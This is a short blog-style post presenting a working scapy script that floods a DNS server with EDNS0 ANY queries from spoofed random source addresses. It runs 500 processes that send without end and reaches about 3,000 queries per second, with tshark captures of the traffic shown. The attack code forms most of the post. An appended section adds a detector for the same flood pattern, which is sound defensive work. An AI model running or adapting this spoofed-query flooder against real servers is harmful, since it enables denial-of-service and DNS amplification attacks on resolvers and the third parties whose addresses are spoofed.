lost and found ( for me ? )

scapy 2.2.0-dev : send a lot of ANY EDNS0 queries with spoofed IP addresses by using scapy and the multiprocessing module

Please note that this script is for scapy 2.2.0-dev.

# cat send_ANY_EDNS0.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

###
# this script is for scapy 2.2.0-dev
# this script can generate crafted EDNS0 foo.bar ANY queries with spoofed IP addresses
# tested with Python 2.7.4
###

import multiprocessing
import logging
# silence scapy's runtime warnings (e.g. missing route / MAC lookups)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import *
import random
import string
import time

domain_string = string.ascii_lowercase + string.digits
target_server = "192.168.10.12"
interface_name = "br0"
target1 = "foo.bar"

# craft EDNS0 foo.bar ANY with spoofed IP addresses
def craft_DNS():
    for j in range(0, 100):
        # random source in 10.0.0.0/8, random source port and DNS id,
        # QTYPE ANY, plus an OPT RR advertising a 4096-byte UDP payload
        packet3 = (IP(src=RandIP("10.0.0.0/8"), dst="%s" % target_server)/UDP(sport=RandShort(), dport=53)/DNS(rd=1L, id=RandShort(), qd=DNSQR(qname="%s" % target1, qtype="ALL", qclass="IN"), ar=DNSRROPT(rclass=4096)))
        # in scapy 2.2.0 a non-zero loop value means "send indefinitely",
        # so send() never returns and the return below is not reached
        send(packet3, verbose=False, loop=500, iface="%s" % interface_name)
        return

if __name__ == '__main__':
    jobs = []
    for i in range(500):
        p = multiprocessing.Process(target=craft_DNS)
        jobs.append(p)
        p.start()
    # note: this only terminates the last worker started
    p.terminate()

I was able to generate around 3,000 queries/sec with my machine; the rate depends on the machine's spec.

# tshark -r b.pcap | grep "query 0x" | head -5
Running as user "root" and group "root". This could be dangerous.
 1 0.000000000 10.205.170.50 -> 192.168.10.12 DNS 78 Standard query 0x6d9d  ANY foo.bar
 2 0.000008000 10.43.165.159 -> 192.168.10.12 DNS 78 Standard query 0x9b08  ANY foo.bar
 5 0.000305000 10.127.169.156 -> 192.168.10.12 DNS 78 Standard query 0x82c3  ANY foo.bar
 6 0.000315000 10.217.216.26 -> 192.168.10.12 DNS 78 Standard query 0x2120  ANY foo.bar
 7 0.000320000  10.20.8.214 -> 192.168.10.12 DNS 78 Standard query 0x2cb8  ANY foo.bar

   Questions: 1
   Answer RRs: 0
   Authority RRs: 0
   Additional RRs: 1
   Queries
       foo.bar: type ANY, class IN
           Name: foo.bar
           Type: ANY (Request for all records)
           Class: IN (0x0001)
   Additional records
       <Root>: type OPT
           Name: <Root>
           Type: OPT (EDNS0 option)
           UDP payload size: 4096
           Higher bits in extended RCODE: 0x0
           EDNS0 version: 0
           Z: 0x8000
               Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)
               Bits 1-15: 0x0 (reserved)
           Data length: 0
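As an added example that is not part of this post, here is a small resolver-side detector (assumption: plain Python 3 standard library, no scapy) that reads tshark's one-line summaries like the ones above and flags the pattern these packets form: many distinct source addresses asking one server for ANY on one name within a single one-second window. The sample lines are the five from the post plus two constructed ones.

```python
#!/usr/bin/env python3
import re
from collections import defaultdict

# One tshark summary line per query, e.g.
#  1 0.000000000 10.205.170.50 -> 192.168.10.12 DNS 78 Standard query 0x6d9d  ANY foo.bar
LINE_RE = re.compile(
    r"^\s*\d+\s+(?P<ts>\d+\.\d+)\s+(?P<src>[\d.]+)\s+->\s+(?P<dst>[\d.]+)"
    r"\s+DNS\s+\d+\s+Standard query 0x[0-9a-f]{4}\s+(?P<qtype>\S+)\s+(?P<qname>\S+)"
)

# Constructed sample: the five ANY lines from the post plus one ordinary A
# query and one lone ANY query 3.5 s later; neither of those should be flagged.
SAMPLE = """\
 1 0.000000000 10.205.170.50 -> 192.168.10.12 DNS 78 Standard query 0x6d9d  ANY foo.bar
 2 0.000008000 10.43.165.159 -> 192.168.10.12 DNS 78 Standard query 0x9b08  ANY foo.bar
 3 0.000100000 10.1.2.3 -> 192.168.10.12 DNS 74 Standard query 0x1111  A www.example.com
 5 0.000305000 10.127.169.156 -> 192.168.10.12 DNS 78 Standard query 0x82c3  ANY foo.bar
 6 0.000315000 10.217.216.26 -> 192.168.10.12 DNS 78 Standard query 0x2120  ANY foo.bar
 7 0.000320000  10.20.8.214 -> 192.168.10.12 DNS 78 Standard query 0x2cb8  ANY foo.bar
 8 3.500000000 10.9.9.9 -> 192.168.10.12 DNS 78 Standard query 0x3333  ANY foo.bar
"""

def parse_queries(lines):
    """Yield (ts, src, dst, qtype, qname) for every line that parses as a query."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield float(m["ts"]), m["src"], m["dst"], m["qtype"], m["qname"]

def find_any_floods(lines, window=1.0, min_queries=4, min_sources=3):
    """Bucket ANY queries by (dst, qname, window start) and return the buckets
    whose query count and distinct-source count both reach the thresholds.
    Many distinct sources asking one server for ANY on one name inside a
    short window is the spoofed-source pattern shown in the capture above."""
    counts = defaultdict(int)
    sources = defaultdict(set)
    for ts, src, dst, qtype, qname in parse_queries(lines):
        if qtype != "ANY":
            continue
        key = (dst, qname, int(ts // window) * window)
        counts[key] += 1
        sources[key].add(src)
    return {k: (counts[k], len(sources[k])) for k in counts
            if counts[k] >= min_queries and len(sources[k]) >= min_sources}

if __name__ == "__main__":
    for (dst, qname, start), (n, s) in find_any_floods(SAMPLE.splitlines()).items():
        print("%s ANY %s: %d queries from %d sources in window at %.1fs" % (dst, qname, n, s, start))
```

On a real capture, feed it `tshark -r file.pcap` output line by line and tune the window and thresholds to the server's normal ANY-query rate.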
